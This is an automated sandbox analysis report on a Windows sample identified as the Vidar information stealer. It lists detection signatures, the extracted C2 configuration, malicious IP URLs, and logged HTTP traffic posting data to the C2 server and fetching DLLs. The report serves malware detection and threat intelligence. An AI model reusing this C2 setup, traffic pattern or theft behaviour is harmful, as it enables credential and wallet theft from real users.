Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1417473
MD5:0ce3dc374e49433d7e15d02c015e0ee3
SHA1:71882bb02d1fa7b4a0f824afdcc1cd53bdb85ba1
SHA256:f714adc256ed7b0d48a50c9b10d0db1d6285541801e720569c86fceeba072697
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0CE3DC374E49433D7E15D02C015E0EE3)
    • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 7544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 7668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "90027e35f6cb548480a6fb8bd7cde0cf", "Version": "8.7"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7472JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: RegAsm.exe PID: 7564JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.3ec5570.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.file.exe.3ec5570.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  3.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: https://78.46.229.36/msvcp140.dllxEAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/HosAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/U&Avira URL Cloud: Label: malware
                      Source: https://78.46.229.36/msvcp140.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/~&Avira URL Cloud: Label: malware
                      Source: https://78.46.229.36/Avira URL Cloud: Label: malware
                      Source: https://78.46.229.36/mozglue.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/softokn3.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/freebl3.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/ramDataAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/nss3.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/mozglue.dll2EAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/p&Avira URL Cloud: Label: malware
                      Source: https://78.46.229.36Avira URL Cloud: Label: malware
                      Source: https://78.46.229.36/msvcp140.dllnEAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/nesAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/softokn3.dllBEAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/vcruntime140.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/dAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/sqlm.dllAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/gAvira URL Cloud: Label: malware
                      Source: https://78.46.229.36/2Avira URL Cloud: Label: malware
                      Source: https://78.46.229.36/BAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "90027e35f6cb548480a6fb8bd7cde0cf", "Version": "8.7"}
                      Multi AV Scanner detection for submitted file
                      Source: file.exeVirustotal: Detection: 29%Perma Link
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406EB0 CryptUnprotectData,LocalAlloc,LocalFree,3_2_00406EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409110 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,3_2_00409110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004115E0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_004115E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406E30 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00406E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C6E6C80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8AA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C8AA9A0
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                      Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: Friendly.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.pdb4 source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                      Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.1986649501.000000006C97F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.1982253965.0000000019EB8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr
                      Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                      Source: Binary string: c:\nconvxoz3\obj\Release\Friendly.pdb source: file.exe
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                      Source: Binary string: System.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.pdb source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD260.tmp.dmp.6.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD260.tmp.dmp.6.dr
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D200 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416310 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_00416310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004173B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004173B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A410 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00416B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040AF10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040AF10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A860 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040A860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416FA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00416FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416750 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00416750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199658817715
                      Source: global trafficHTTP traffic detected: GET /profiles/76561199658817715 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 78.46.229.36 78.46.229.36
                      Source: Joe Sandbox ViewIP Address: 104.112.44.153 104.112.44.153
                      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 7117Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlm.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 130713Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
                      Source: unknownTCP traffic detected without corresponding DNS query: 78.46.229.36
